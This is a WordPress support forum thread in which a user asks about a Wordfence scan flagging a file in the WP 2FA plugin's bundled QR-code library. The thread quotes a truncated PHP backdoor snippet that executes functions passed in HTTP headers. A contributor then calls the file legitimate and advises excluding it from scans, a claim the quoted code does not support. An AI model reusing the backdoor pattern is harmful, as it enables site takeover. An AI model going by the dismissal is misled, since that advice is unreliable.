Wordfence flagging malicious files in your plugin

  • Resolved netzenrob

    (@netzenrob)


    1 year, 11 months ago

    Hello,

    Just done a scan with Wordfence and it’s picked up these files which seem to reside in your plugin, please can you clarify what these are:

    • Filename:?/html/wp-content/plugins/wp-2fa/vendor/bacon/bacon-qr-code/test/Integration/old_con.php
    • File Type: Not a core, theme, or plugin file from www.ads-software.com.
    • Details:?This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is:?<?php\x0a$_HEADERS = getallheaders();\x0d\x0aif (isset($_HEADERS[‘If-Unmodified-Since’])) {\x0d\x0a?$system = $_HEADERS[‘If-Unmodified-Since’](”, $_HEADERS[‘X-Dns-Prefetch-Control’]($_HEADERS[‘Clear-Site-Data’])…

      The issue type is:?Backdoor:PHP/rce.if-modified.9373
      Description:?Injected malware code used for remote code execution and site takeovers

    Thanks
    Rob

Viewing 1 replies (of 1 total)
  • Plugin Contributor robertabela

    (@robert681)

    Thank you for using our plugin @netzenrob

    That file is from the Bacon QR generator library we use in the plugin, that is used to generate the QR codes for 2FA. You can see the project source code on Github.

    I can confirm that it is a legitimate file and there are no issues, so as Wordfence suggested, you can safely exclude this file from the scans.

    Please let us know should you need any further information.

Viewing 1 replies (of 1 total)
  • The topic ‘Wordfence flagging malicious files in your plugin’ is closed to new replies.